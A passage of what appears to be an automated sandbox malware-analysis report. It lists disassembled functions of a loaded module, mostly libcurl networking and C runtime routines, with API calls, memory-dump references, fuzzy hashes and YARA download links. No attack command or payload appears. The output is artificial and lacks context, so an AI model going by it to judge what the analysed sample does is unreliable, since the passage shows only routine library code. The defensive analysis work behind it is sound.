                                                                                                                                  • freeaddrinfo.WS2_32(6B93B330,?,?,6B93B330,?), ref: 6B8D6F4C
                                                                                                                                  • WSASetLastError.WS2_32(00002AF9,?,?,6B93B330,?), ref: 6B8D6F99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1817844550-0
                                                                                                                                  • Opcode ID: b97332d71e9d8e54b95ab218d7a12c918dce4fccc2bfd2bb7911326389864dbe
                                                                                                                                  • Instruction ID: d6412b3b00ca99c8d8ddeee7ab2c0b5e4ce957faf69e1f04165c22f038219a63
                                                                                                                                  • Opcode Fuzzy Hash: b97332d71e9d8e54b95ab218d7a12c918dce4fccc2bfd2bb7911326389864dbe
                                                                                                                                  • Instruction Fuzzy Hash: 7651ADB2E04B1AAFDB10CFA9D580A5AB7F5FF49710B1089AEE85897300D734E914CBD0
                                                                                                                                  Function 6B928360 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(6B8D16D0,6B8D1218,6B928204,00000000,00000000,6B8D16D0), ref: 6B9283A9
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6B8D9136,00000000,00000000,6B8D16D0,6B8D1218,00000000,00000000), ref: 6B9283B5
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B9283BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2744730728-0
                                                                                                                                  • Opcode ID: 4d9817330570502d4bab6877b55cc5a7114993e527ddaa970af84ab7b78e0130
                                                                                                                                  • Instruction ID: 197d18d0a7acf052301a8835bd6166b701a9776a459c10a7cc75bc335582303f
                                                                                                                                  • Opcode Fuzzy Hash: 4d9817330570502d4bab6877b55cc5a7114993e527ddaa970af84ab7b78e0130
                                                                                                                                  • Instruction Fuzzy Hash: C6018C32D24219ABDF099FA1CC45A9E7BA8EF05368F008058B81196148DB79DA10DBA0
                                                                                                                                  Function 6B8D4740 Relevance: 4.5, APIs: 3, Instructions: 36networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SleepEx.KERNEL32(00000000,00000000), ref: 6B8D4758
                                                                                                                                  • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B8D4773
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D477D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastSleepgetsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033474312-0
                                                                                                                                  • Opcode ID: dd4f2775c96d2b85f7e996ae0d1a66d987b80ffdafc1ff7c090d34b43f4708e4
                                                                                                                                  • Instruction ID: 2abf33cda3d0e3e4d2b68bcd0d7d5c223ffff1e7834827287f73122ec62a870d
                                                                                                                                  • Opcode Fuzzy Hash: dd4f2775c96d2b85f7e996ae0d1a66d987b80ffdafc1ff7c090d34b43f4708e4
                                                                                                                                  • Instruction Fuzzy Hash: F2F0967464410DFBEF109FA1C8457AE7BBCBB43701F2045A5EA189B2C0D775D5058B50
                                                                                                                                  Function 6B8D1050 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B8D115D
                                                                                                                                  Strings
                                                                                                                                  • getaddrinfo() thread failed to start, xrefs: 6B8D11AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                  • String ID: getaddrinfo() thread failed to start
                                                                                                                                  • API String ID: 32694325-737161664
                                                                                                                                  • Opcode ID: e5015b711fc6315620fbbefa526a4a7ab979c6ba36a6bf1a55a7005000db5d53
                                                                                                                                  • Instruction ID: f6f40dd5851d1008344ac2dbdbd3b6c388aab142d9efd0f7abf7e1e9182b447c
                                                                                                                                  • Opcode Fuzzy Hash: e5015b711fc6315620fbbefa526a4a7ab979c6ba36a6bf1a55a7005000db5d53
                                                                                                                                  • Instruction Fuzzy Hash: 3D51D371D44226EBDB009F79DC457997BB0FF06318F004676EE089B281EB79E594CBA1
                                                                                                                                  Function 6B9007E0 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • recv.WS2_32(00000008,?,?,00000000), ref: 6B9007EE
                                                                                                                                  • WSAGetLastError.WS2_32(?,6B90737C,?,?,00000008,?), ref: 6B9007FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2514157807-0
                                                                                                                                  • Opcode ID: 74b812f2b3c66a95e508cf721b43fa6d20526a540c4c1e6bdcca4273caabfe04
                                                                                                                                  • Instruction ID: f99987875b5c3d63829c3feb53c30a93e36f48e8f02e827ed96d4670275ce296
                                                                                                                                  • Opcode Fuzzy Hash: 74b812f2b3c66a95e508cf721b43fa6d20526a540c4c1e6bdcca4273caabfe04
                                                                                                                                  • Instruction Fuzzy Hash: 16E0E53520820CAFDF059F60D85579E3BAAEF45324F504668F9198A2D0CA76D8619B54
                                                                                                                                  Function 6B8F6DA0 Relevance: 1.6, APIs: 1, Instructions: 86networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2692171526-0
                                                                                                                                  • Opcode ID: 135e40721cc340b4567a099b869d8ea7aa86c40cee416c92410130c9293bfec1
                                                                                                                                  • Instruction ID: e60a3ece564e2c1e0c197a8964b9c311bc2ac5f47735c5dd2dab379b8153853e
                                                                                                                                  • Opcode Fuzzy Hash: 135e40721cc340b4567a099b869d8ea7aa86c40cee416c92410130c9293bfec1
                                                                                                                                  • Instruction Fuzzy Hash: 8D21D87690071466DB20ABB9DC06F8B77ED9F01798F000D6AE959D7141E73EF1058771
                                                                                                                                  Function 6B8F7990 Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSACloseEvent.WS2_32(50000000), ref: 6B8F7A66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2624557715-0
                                                                                                                                  • Opcode ID: d9233ddd1e417b1a271e5f4ed3cdb284a44c503a1524aabce2a6069fcf0404c3
                                                                                                                                  • Instruction ID: 8cff917480396f58038cbd052b9709559e3f2ae2fbdfb340f0e423f778a05ea3
                                                                                                                                  • Opcode Fuzzy Hash: d9233ddd1e417b1a271e5f4ed3cdb284a44c503a1524aabce2a6069fcf0404c3
                                                                                                                                  • Instruction Fuzzy Hash: 4621257A9006109BFB219F74DC85F8A77ECEF01358F0408A9E9185B142C77EE546C7B1
                                                                                                                                  Function 6B8D2370 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_init.LIBCURL(00000044,00000000,?,6B8F6E06,00000078,?,?,?,?,?,?,?), ref: 6B8D2375
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_init
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4195830768-0
                                                                                                                                  • Opcode ID: 79ba0a1891940e68c7f58331b030faa22a9456d966015cc8b81074a52211524a
                                                                                                                                  • Instruction ID: c2698b00753f7c2182097b87b2f9ea714753ea2d6f9ee2f28d46dc2c47114f88
                                                                                                                                  • Opcode Fuzzy Hash: 79ba0a1891940e68c7f58331b030faa22a9456d966015cc8b81074a52211524a
                                                                                                                                  • Instruction Fuzzy Hash: C2F0903A3002146BD6005EADFC80AEAB798FB81178B000977FA0C87601D369E51242F0
                                                                                                                                  Function 6B92F78D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B92F6DD,00000001,00000364,00000015,000000FF), ref: 6B92F7CE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 64dd5336a5a7eddd13845f88df0eb54ca95da947de1399df28c10b995167f299
                                                                                                                                  • Instruction ID: 2bc03ca940c5a351a3971eb97d1e7106e91939a866c5d6423048f4741606544f
                                                                                                                                  • Opcode Fuzzy Hash: 64dd5336a5a7eddd13845f88df0eb54ca95da947de1399df28c10b995167f299
                                                                                                                                  • Instruction Fuzzy Hash: 74F05932E2953467FB102E328C01B4E374CBF42B6CF114062EC24D6AA8DB7CD80046A1
                                                                                                                                  Function 6B930EBD Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,6B933F01,00000220,?,?,00000000,?,?,?,6B9284AA,6B928987,00000000,?), ref: 6B930EEF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 09b25eb73e67be761e424006ab9a08ff51d2fe8cc25f0b675ed558441cd6816c
                                                                                                                                  • Instruction ID: da6e8a69bb2a8675382822d68ed6efe1c8e249ccdfe5d236578a6f52fe3605e5
                                                                                                                                  • Opcode Fuzzy Hash: 09b25eb73e67be761e424006ab9a08ff51d2fe8cc25f0b675ed558441cd6816c
                                                                                                                                  • Instruction Fuzzy Hash: 69E0ED31389236A7EB301A7A8C01B4B7F4CEF827A4F1200A0ECA4A6580DB2CC80082A1
                                                                                                                                  Function 6B8E8A20 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000017,00000002,00000000), ref: 6B8E8A3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: socket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                  • Opcode ID: 938cabb624811b6db587dddf29feb8f1134c307646042e0c026b5f9ba7c5476d
                                                                                                                                  • Instruction ID: 65b93bd4ddbf9b805a15647eed2efe4b11c41f9f85fc6fe5abe175650aacf2f9
                                                                                                                                  • Opcode Fuzzy Hash: 938cabb624811b6db587dddf29feb8f1134c307646042e0c026b5f9ba7c5476d
                                                                                                                                  • Instruction Fuzzy Hash: EDE086343883446AE9005A68EC46FE837A84B06725F4046E1F52C9F6E1C365E842A621
                                                                                                                                  Function 6B92F3D6 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F40D
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F419
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F424
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F42F
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F43A
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F445
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F450
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F45B
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F466
                                                                                                                                    • Part of subcall function 6B92F3F7: _free.LIBCMT ref: 6B92F474
                                                                                                                                  • _free.LIBCMT ref: 6B92F3EC
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: fea6b7e79df37b2ffaf56218ff71ab444ebea1fe4eac95b0eebf2ed6cec7a598
                                                                                                                                  • Instruction ID: 14d0f4fd1361c9aedcf0398ec75e5a8979fdf31a13d9b9dacc0b7a9b1baa634e
                                                                                                                                  • Opcode Fuzzy Hash: fea6b7e79df37b2ffaf56218ff71ab444ebea1fe4eac95b0eebf2ed6cec7a598
                                                                                                                                  • Instruction Fuzzy Hash: 76C0123241820CABDB011A20EC06B993B99EB5029CF208066F50C040749F3AD5A1D584
                                                                                                                                  Function 6B8FA660 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ioctlsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3577187118-0
                                                                                                                                  • Opcode ID: 0ad70b1a8a426fe98decb3ca19e9b73d0b287f18b6c4cf3d93f575451d3d2d09
                                                                                                                                  • Instruction ID: 57a19dd688cbedb9dcc2666c68fe9e3fed8c4e3fe4f8ae432a5b7272833d5466
                                                                                                                                  • Opcode Fuzzy Hash: 0ad70b1a8a426fe98decb3ca19e9b73d0b287f18b6c4cf3d93f575451d3d2d09
                                                                                                                                  • Instruction Fuzzy Hash: 0BD0CA3240020CFFCB00AEB1C8048DA7BADEB04225B00C03AB9198A020EA34EA60DF84
                                                                                                                                  Function 6B9280B5 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B9280C8
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1353095263-0
                                                                                                                                  • Opcode ID: dd3f656dcbf88fecb6cdb2bd3514b2d306074cae23e660cbfa2099e7d0299107
                                                                                                                                  • Instruction ID: 3ac6a99c47074e0bb6a6f8f7ca55df66d54d3f8b33be70e7986ebb5af7a00407
                                                                                                                                  • Opcode Fuzzy Hash: dd3f656dcbf88fecb6cdb2bd3514b2d306074cae23e660cbfa2099e7d0299107
                                                                                                                                  • Instruction Fuzzy Hash: 93C08C31800208FBDB008B51D806F4E7BA8EB8026CF200044E40417250CBB1EE009680

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 6B8E8A80 Relevance: 168.3, APIs: 25, Strings: 70, Instructions: 2020COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s?%s,?,?), ref: 6B8E8C68
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$%x$/$0$1.0$1.1$100-continue$;type=$;type=%c$?%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Cookie$Cookie: $Could not seek stream$Could only read %I64d bytes from the input$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$POST$PUT$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$Transfer-Encoding$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent$chunked$ftp$ftp://%s:%s@%s$http$multipart/form-data$upload completely sent off: %I64d out of %I64d bytes
                                                                                                                                  • API String ID: 3307269620-2642765789
